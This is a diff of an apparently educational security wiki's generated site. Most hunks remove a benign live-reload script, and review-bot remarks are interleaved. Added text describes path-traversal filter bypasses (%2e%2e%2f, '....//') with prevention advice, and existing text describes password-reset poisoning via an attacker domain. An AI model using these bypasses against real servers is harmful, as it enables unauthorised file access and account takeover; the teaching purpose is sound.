- - diff --git a/docs/Reconnaissance/OSINT/Tools/index.html b/docs/Reconnaissance/OSINT/Tools/index.html index 28f71a8d..a647f30a 100644 --- a/docs/Reconnaissance/OSINT/Tools/index.html +++ b/docs/Reconnaissance/OSINT/Tools/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Reconnaissance/OSINT/Tools/recon-ng.html b/docs/Reconnaissance/OSINT/Tools/recon-ng.html index 07f62c8d..bc62f897 100644 --- a/docs/Reconnaissance/OSINT/Tools/recon-ng.html +++ b/docs/Reconnaissance/OSINT/Tools/recon-ng.html @@ -100,7 +100,7 @@ @@ -274,22 +274,6 @@

profiler

- - diff --git a/docs/Reconnaissance/OSINT/Tools/theHarvester.html b/docs/Reconnaissance/OSINT/Tools/theHarvester.html index 9e9cae89..c9b33d7d 100644 --- a/docs/Reconnaissance/OSINT/Tools/theHarvester.html +++ b/docs/Reconnaissance/OSINT/Tools/theHarvester.html @@ -100,7 +100,7 @@ @@ -189,22 +189,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/OSINT/Whois Enumeration.html b/docs/Reconnaissance/OSINT/Whois Enumeration.html index d2d91119..d77e4a8e 100644 --- a/docs/Reconnaissance/OSINT/Whois Enumeration.html +++ b/docs/Reconnaissance/OSINT/Whois Enumeration.html @@ -100,7 +100,7 @@ @@ -200,22 +200,6 @@

Rev - - diff --git a/docs/Reconnaissance/OSINT/index.html b/docs/Reconnaissance/OSINT/index.html index 3d8523d2..415754b3 100644 --- a/docs/Reconnaissance/OSINT/index.html +++ b/docs/Reconnaissance/OSINT/index.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Reconnaissance/index.html b/docs/Reconnaissance/index.html index 2ce83dcc..18411863 100644 --- a/docs/Reconnaissance/index.html +++ b/docs/Reconnaissance/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Assembly Programming/index.html b/docs/Reverse Engineering/Assembly Programming/index.html index b0ff8b2c..aadfad79 100644 --- a/docs/Reverse Engineering/Assembly Programming/index.html +++ b/docs/Reverse Engineering/Assembly Programming/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html index 745c8099..fae77703 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Addressing Modes.html @@ -100,7 +100,7 @@ @@ -208,22 +208,6 @@

- - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html index e89ab9ee..36b1f394 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Data Representation.html @@ -100,7 +100,7 @@ @@ -189,22 +189,6 @@

Two's Complem - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html index b803fdbe..2500e50a 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Instruction Set.html @@ -100,7 +100,7 @@ @@ -189,22 +189,6 @@

Operand Not - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html index d9f8cd5e..14022b6d 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Memory.html @@ -100,7 +100,7 @@ @@ -185,22 +185,6 @@

Memory Layout - - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html index 3100897f..e1eb6c37 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Registers.html @@ -100,7 +100,7 @@ @@ -235,22 +235,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html b/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html index 517f2ed7..6e1f5240 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/Variables.html @@ -100,7 +100,7 @@ @@ -223,22 +223,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reverse Engineering/Assembly Programming/x86-64/index.html b/docs/Reverse Engineering/Assembly Programming/x86-64/index.html index 2c8c2170..47ec48c6 100644 --- a/docs/Reverse Engineering/Assembly Programming/x86-64/index.html +++ b/docs/Reverse Engineering/Assembly Programming/x86-64/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Assembly.html b/docs/Reverse Engineering/Assembly.html index 57948779..aace2483 100644 --- a/docs/Reverse Engineering/Assembly.html +++ b/docs/Reverse Engineering/Assembly.html @@ -100,7 +100,7 @@ @@ -198,22 +198,6 @@

AT&T

- - diff --git a/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html b/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html index e60315b7..3b4df521 100644 --- a/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html +++ b/docs/Reverse Engineering/Basic Reverse Engineering using objdump, strace, and ltrace.html @@ -100,7 +100,7 @@ @@ -209,22 +209,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html b/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html index 2cec7a8b..5a91ef7d 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Dynamic Linking.html @@ -100,7 +100,7 @@ @@ -195,22 +195,6 @@

- - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html b/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html index f9cce5ef..d062e974 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Relocations.html @@ -100,7 +100,7 @@ @@ -221,22 +221,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Sections.html b/docs/Reverse Engineering/Binary Formats/ELF/Sections.html index fd962af6..0a6c01ff 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Sections.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Sections.html @@ -100,7 +100,7 @@ @@ -368,22 +368,6 @@

Section Groups< - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Segments.html b/docs/Reverse Engineering/Binary Formats/ELF/Segments.html index 95aaf284..25f37a52 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Segments.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Segments.html @@ -100,7 +100,7 @@ @@ -289,22 +289,6 @@

Segment Flags - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html b/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html index 54c490b8..eab0e676 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/Symbols.html @@ -100,7 +100,7 @@ @@ -279,22 +279,6 @@

Symbol Vi - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html b/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html index 7f7cb93f..2f09411e 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/The ELF Header.html @@ -100,7 +100,7 @@ @@ -402,22 +402,6 @@

ELF Ide - - diff --git a/docs/Reverse Engineering/Binary Formats/ELF/index.html b/docs/Reverse Engineering/Binary Formats/ELF/index.html index e73d481e..b59db7f4 100644 --- a/docs/Reverse Engineering/Binary Formats/ELF/index.html +++ b/docs/Reverse Engineering/Binary Formats/ELF/index.html @@ -100,7 +100,7 @@ @@ -187,22 +187,6 @@

File Types

- - diff --git a/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html b/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html index f055ff7a..663e5566 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html +++ b/docs/Reverse Engineering/Binary Formats/PE/NT Headers.html @@ -100,7 +100,7 @@ @@ -322,22 +322,6 @@

Optional Head - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/Relocations.html b/docs/Reverse Engineering/Binary Formats/PE/Relocations.html index f1c14e3d..4d4c62a0 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/Relocations.html +++ b/docs/Reverse Engineering/Binary Formats/PE/Relocations.html @@ -100,7 +100,7 @@ @@ -191,22 +191,6 @@

The - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/Sections.html b/docs/Reverse Engineering/Binary Formats/PE/Sections.html index 0360ddbf..bdfe6ca6 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/Sections.html +++ b/docs/Reverse Engineering/Binary Formats/PE/Sections.html @@ -100,7 +100,7 @@ @@ -253,22 +253,6 @@

Data Direct - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html b/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html index 50c2894e..ab23a7fd 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html +++ b/docs/Reverse Engineering/Binary Formats/PE/The DOS Header.html @@ -100,7 +100,7 @@ @@ -202,22 +202,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html b/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html index a1efee5d..1338e156 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html +++ b/docs/Reverse Engineering/Binary Formats/PE/The DOS Stub.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html b/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html index cc3dcb74..f4d7c648 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html +++ b/docs/Reverse Engineering/Binary Formats/PE/The Rich Header.html @@ -100,7 +100,7 @@ @@ -180,22 +180,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/PE/index.html b/docs/Reverse Engineering/Binary Formats/PE/index.html index 51a0d443..9731e391 100644 --- a/docs/Reverse Engineering/Binary Formats/PE/index.html +++ b/docs/Reverse Engineering/Binary Formats/PE/index.html @@ -100,7 +100,7 @@ @@ -181,22 +181,6 @@

Structure

- - diff --git a/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html b/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html index 29bb9a6b..41a1ca7b 100644 --- a/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html +++ b/docs/Reverse Engineering/Binary Formats/Reverse Engineering Android Applications.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Reverse Engineering/Binary Formats/index.html b/docs/Reverse Engineering/Binary Formats/index.html index 90cc7dbb..23d7b294 100644 --- a/docs/Reverse Engineering/Binary Formats/index.html +++ b/docs/Reverse Engineering/Binary Formats/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Reverse Engineering/Program Anatomy/Instructions.html b/docs/Reverse Engineering/Program Anatomy/Instructions.html index 2225314d..39c09dec 100644 --- a/docs/Reverse Engineering/Program Anatomy/Instructions.html +++ b/docs/Reverse Engineering/Program Anatomy/Instructions.html @@ -100,7 +100,7 @@ @@ -221,22 +221,6 @@

jz / jnz - - diff --git a/docs/Reverse Engineering/Program Anatomy/Registers.html b/docs/Reverse Engineering/Program Anatomy/Registers.html index efba8b6a..1554c784 100644 --- a/docs/Reverse Engineering/Program Anatomy/Registers.html +++ b/docs/Reverse Engineering/Program Anatomy/Registers.html @@ -100,7 +100,7 @@ @@ -221,22 +221,6 @@

- - diff --git a/docs/Reverse Engineering/Program Anatomy/The Heap.html b/docs/Reverse Engineering/Program Anatomy/The Heap.html index 18c3f8fb..ce44f36c 100644 --- a/docs/Reverse Engineering/Program Anatomy/The Heap.html +++ b/docs/Reverse Engineering/Program Anatomy/The Heap.html @@ -100,7 +100,7 @@ @@ -315,22 +315,6 @@

Deallocation - - diff --git a/docs/Reverse Engineering/Program Anatomy/The Stack.html b/docs/Reverse Engineering/Program Anatomy/The Stack.html index 66fcc7ac..c482ef81 100644 --- a/docs/Reverse Engineering/Program Anatomy/The Stack.html +++ b/docs/Reverse Engineering/Program Anatomy/The Stack.html @@ -100,7 +100,7 @@ @@ -192,22 +192,6 @@

Stack Frames - - diff --git a/docs/Reverse Engineering/Program Anatomy/index.html b/docs/Reverse Engineering/Program Anatomy/index.html index 14b9e3c2..3a7d4c50 100644 --- a/docs/Reverse Engineering/Program Anatomy/index.html +++ b/docs/Reverse Engineering/Program Anatomy/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Program Anato - - diff --git a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html index e50c5bca..f1bf1547 100644 --- a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html +++ b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Creating a Project and Loading a Binary.html @@ -100,7 +100,7 @@ @@ -205,22 +205,6 @@

Loading a B - - diff --git a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html index aabaf49e..eacec03b 100644 --- a/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html +++ b/docs/Reverse Engineering/Reverse Engineering with Ghidra/Initial Analysis.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Initial Ana - - diff --git a/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html b/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html index c15320cf..a03203e2 100644 --- a/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html +++ b/docs/Reverse Engineering/Reverse Engineering with Ghidra/index.html @@ -100,7 +100,7 @@ @@ -178,22 +178,6 @@

Installation - - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html index 5e4eb254..7c48aa6b 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Analysis.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

Analysis

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html index 28c2e0b8..e7202fa8 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Binary Info.html @@ -100,7 +100,7 @@ @@ -195,22 +195,6 @@

Binary Info

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html index 0016c9fc..0e40c4c5 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Flags.html @@ -100,7 +100,7 @@ @@ -210,22 +210,6 @@

Flag Spaces

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html index c7101e50..a864c93d 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html @@ -100,7 +100,7 @@ @@ -216,22 +216,6 @@

Seeking

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html index 40700b55..1dec34a1 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html @@ -100,7 +100,7 @@ @@ -183,22 +183,6 @@

Strings

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/index.html b/docs/Reverse Engineering/Reverse Engineering with radare2/index.html index 404c175e..ce667e3b 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/index.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/index.html @@ -100,7 +100,7 @@ @@ -181,22 +181,6 @@

Loading a B - - diff --git a/docs/Reverse Engineering/index.html b/docs/Reverse Engineering/index.html index 1c2a4506..717ba0e9 100644 --- a/docs/Reverse Engineering/index.html +++ b/docs/Reverse Engineering/index.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

Rever - - diff --git a/docs/System Internals/Linux/Command Line.html b/docs/System Internals/Linux/Command Line.html index f8bd4160..410440e6 100644 --- a/docs/System Internals/Linux/Command Line.html +++ b/docs/System Internals/Linux/Command Line.html @@ -100,7 +100,7 @@ @@ -191,22 +191,6 @@

Pipes

- - diff --git a/docs/System Internals/Linux/File System.html b/docs/System Internals/Linux/File System.html index cd14fb3c..3263205d 100644 --- a/docs/System Internals/Linux/File System.html +++ b/docs/System Internals/Linux/File System.html @@ -100,7 +100,7 @@ @@ -244,22 +244,6 @@

Sticky Bit

- - diff --git a/docs/System Internals/Linux/Processes.html b/docs/System Internals/Linux/Processes.html index db49e676..4a582df8 100644 --- a/docs/System Internals/Linux/Processes.html +++ b/docs/System Internals/Linux/Processes.html @@ -100,7 +100,7 @@ @@ -175,22 +175,6 @@

User ID

- - diff --git a/docs/System Internals/Linux/index.html b/docs/System Internals/Linux/index.html index aa53b82b..e6e23edd 100644 --- a/docs/System Internals/Linux/index.html +++ b/docs/System Internals/Linux/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Computers.html b/docs/System Internals/Windows/Active Directory (AD)/Computers.html index d52dd283..f535b7dd 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Computers.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Computers.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Contacts.html b/docs/System Internals/Windows/Active Directory (AD)/Contacts.html index 7180c918..717b2a95 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Contacts.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Contacts.html @@ -100,7 +100,7 @@ @@ -177,22 +177,6 @@

Introduction - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html b/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html index baf4ff16..6e6febe8 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html @@ -100,7 +100,7 @@ @@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Groups.html b/docs/System Internals/Windows/Active Directory (AD)/Groups.html index b22365c0..e06d9dad 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Groups.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Groups.html @@ -100,7 +100,7 @@ @@ -220,22 +220,6 @@

Default Groups< - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Terminology.html b/docs/System Internals/Windows/Active Directory (AD)/Terminology.html index 26b94a88..298b307b 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Terminology.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Terminology.html @@ -100,7 +100,7 @@ @@ -176,22 +176,6 @@

The Cyberclopaedia

- - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Users.html b/docs/System Internals/Windows/Active Directory (AD)/Users.html index a08a6004..1e239334 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Users.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Users.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

Domain Users - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/index.html b/docs/System Internals/Windows/Active Directory (AD)/index.html index 4770a417..b9c5a080 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/index.html +++ b/docs/System Internals/Windows/Active Directory (AD)/index.html @@ -100,7 +100,7 @@ @@ -248,22 +248,6 @@

Trusts

- - diff --git a/docs/System Internals/Windows/File System.html b/docs/System Internals/Windows/File System.html index b213a7b6..f21cae60 100644 --- a/docs/System Internals/Windows/File System.html +++ b/docs/System Internals/Windows/File System.html @@ -100,7 +100,7 @@ @@ -223,22 +223,6 @@

Working w - - diff --git a/docs/System Internals/Windows/index.html b/docs/System Internals/Windows/index.html index e1503757..236baac6 100644 --- a/docs/System Internals/Windows/index.html +++ b/docs/System Internals/Windows/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/System Internals/index.html b/docs/System Internals/index.html index 513572bc..34e7396b 100644 --- a/docs/System Internals/index.html +++ b/docs/System Internals/index.html @@ -100,7 +100,7 @@ @@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/index.html b/docs/index.html index bc2178a6..4051fff2 100644 --- a/docs/index.html +++ b/docs/index.html @@ -100,7 +100,7 @@ @@ -186,22 +186,6 @@

The Cyberclopaedia
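Review bot: the block being deleted from every generated page in this series (a WebSocket client that connects to `location.host + "/__livereload"` and calls `location.reload()` when it receives "reload") is the live-reload hook that the site generator's development server injects, so the previously committed docs/ output was produced by a dev-server build and published with that hook in it. Removing it is correct; to stop it reappearing, build docs/ in CI from the Markdown sources (or keep docs/ out of the repository and deploy from the build job) instead of committing hand-built output, since dozens of near-identical hunks like these cannot be reviewed by eye.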

- - diff --git a/docs/print.html b/docs/print.html index bd1094e3..a76e098b 100644 --- a/docs/print.html +++ b/docs/print.html @@ -101,7 +101,7 @@ @@ -1916,6 +1916,18 @@

Filter Bypass

+

URL encoding can be used to bypass many filters which try to filter out the ../ sequence from user input because they literally look for this specific characters and not their URL representations. The URL encoding of the . character is %2e and the / character gets encoded to %2f. The whole sequence can therefore be represented as %2e%2e%2f.

+

Some filters try to strip out the ../ sequence before handling requests. Oftentimes, however, these filters are non-recursive and only check the input once. Since the filter only goes over the string once and does not check the resulting string as well, the sequence ....// will be changed to ../ after the middle ../ is removed.

+

Prevention

+

One should avoid passing user input to file system APIs entirely. If this is absolutely impossible to implement, then user input should be validated before processing. In the ideal case this should happen by comparing the input with a whitelist of permitted values. At the very least, one should verify that the user input contains only permitted characters such as alphanumeric ones.

+

After such validation, the user input should be appended to the base directory and the file system API should be used canonicalise the resulting path. Ultimately, one should verify that this canonical path begins with the base directory.

+

Overview

HTTP Parameter Pollution describes the set of techniques used for manipulating how a server handles parameters in an HTTP request. This vulnerability may occur when duplicating or additional parameters are injected into an HTTP request and the website trusts them. Usually, HPP (HTTP Parameter Pollution) vulnerabilities depend on the way the server-side code handles parameters.

Server-Side HPP
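Review bot: two wording slips in the added Filter Bypass and Prevention text will ship in the generated page: "they literally look for this specific characters" should read "these specific characters", and "the file system API should be used canonicalise the resulting path" is missing "to" ("used to canonicalise"). Because docs/print.html is build output, fix the Markdown source and regenerate rather than patching the HTML. On the last added sentence, "verify that this canonical path begins with the base directory": a plain string-prefix check should compare against the base directory including its trailing path separator, otherwise a sibling directory whose name merely starts with the base directory's name passes the check.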

@@ -1993,7 +2005,7 @@

When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request.

This type of attack, however, does not always require user interaction because emails are typically scanned be it to determine if they are spam or if they contain a virus and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.

-

Prevention

+

Prevention

  1. Check to see if absolute URLs are necessary and cannot be replaced with relative ones.
  2. If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header.
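Review bot: the removed and added lines both render as "Prevention", so this hunk shows no visible text change in the extracted view; the most likely explanation is that only the heading's generated anchor changed because the earlier hunk inserts another "Prevention" heading before it in print.html. Confirm that the anchor renumbering is the whole change and that nothing links to the old anchor of this section.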
  3. @@ -9595,22 +9607,6 @@

    Native VLAN

    - - diff --git a/docs/searchindex.js b/docs/searchindex.js index 06d40f20..7a230db8 100644 --- a/docs/searchindex.js +++ b/docs/searchindex.js 
@@ -1 +1 @@ -Object.assign(window.search, {"doc_urls":["Cyberclopaedia/index.html","Cyberclopaedia/Contributing.html#overview","Cyberclopaedia/Contributing.html#in-scope","Cyberclopaedia/Contributing.html#out-of-scope","Cyberclopaedia/Contributing.html#structure","Cyberclopaedia/Contributing.html#naming","Cyberclopaedia/Contributing.html#folder-organisation","Cyberclopaedia/Contributing.html#page-structure","Cyberclopaedia/Contributing.html#toolchain","Cyberclopaedia/Contributing.html#licensing","Cyberclopaedia/License.html","Reconnaissance/index.html#introduction","Reconnaissance/Enumeration/index.html#overview","Reconnaissance/Enumeration/index.html#types-of-scanning","Reconnaissance/Enumeration/index.html#port-scanning","Reconnaissance/Enumeration/index.html#network-scanning","Reconnaissance/Enumeration/index.html#vulnerability-scanning","Reconnaissance/Enumeration/Port Scanning/index.html#introduction","Reconnaissance/Enumeration/Port Scanning/index.html#tcp-vs-udp","Reconnaissance/Enumeration/Port Scanning/index.html#port-states","Reconnaissance/Enumeration/Port Scanning/SYN Scan.html#syn-scan","Reconnaissance/Enumeration/Port Scanning/TCP Connect Scan.html#tcp-connect-scan","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#overview","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#null-scan","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#fin-scan","Reconnaissance/Enumeration/Port Scanning/FIN, NULL & XMAS Scans.html#xmas-scan","Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html#obtaining-version-information","Reconnaissance/Enumeration/Web Server Enumeration (80, 443).html#directory-brute-force","Reconnaissance/Enumeration/DNS Server Enumeration (53).html#enumerating-bind-servers-with-chaos","Reconnaissance/Enumeration/DNS Server Enumeration (53).html#dns-zone-transfer","Reconnaissance/Enumeration/FTP Enumeration (21).html#introduction","Reconnaissance/Enumeration/SNMP Enumeration 
(161).html#introduction","Reconnaissance/Enumeration/SNMP Enumeration (161).html#snmp-enumeration-using-snmp-check","Reconnaissance/Enumeration/SNMP Enumeration (161).html#snmp-enumeration-using-snmpwalk","Reconnaissance/Enumeration/SNMP Enumeration (161).html#bruteforce-community-strings-with-onesixtyone","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#introduction","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#sniffing-clear-text-credentials","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#credentials-validation","Reconnaissance/Enumeration/LDAP Enumeration (389, 636, 3268, 3269).html#enumerating-the-database","Reconnaissance/OSINT/index.html#introduction","Reconnaissance/OSINT/Tools/index.html","Reconnaissance/OSINT/Tools/theHarvester.html#what-is-theharvester","Reconnaissance/OSINT/Tools/theHarvester.html#email-and-subdomain-harvesting","Reconnaissance/OSINT/Tools/recon-ng.html#what-is-recon-ng","Reconnaissance/OSINT/Tools/recon-ng.html#setup","Reconnaissance/OSINT/Tools/recon-ng.html#workflow","Reconnaissance/OSINT/Tools/recon-ng.html#modules","Reconnaissance/OSINT/Tools/recon-ng.html#profiler","Reconnaissance/OSINT/Domain Name Enumeration.html#using-whois-for-gathering-domain-name-and-ip-address-information","Reconnaissance/OSINT/Domain Name Enumeration.html#using-host-for-quick-lookups","Reconnaissance/OSINT/Domain Name Enumeration.html#querying-name-servers-with-dig","Reconnaissance/OSINT/Harvesting 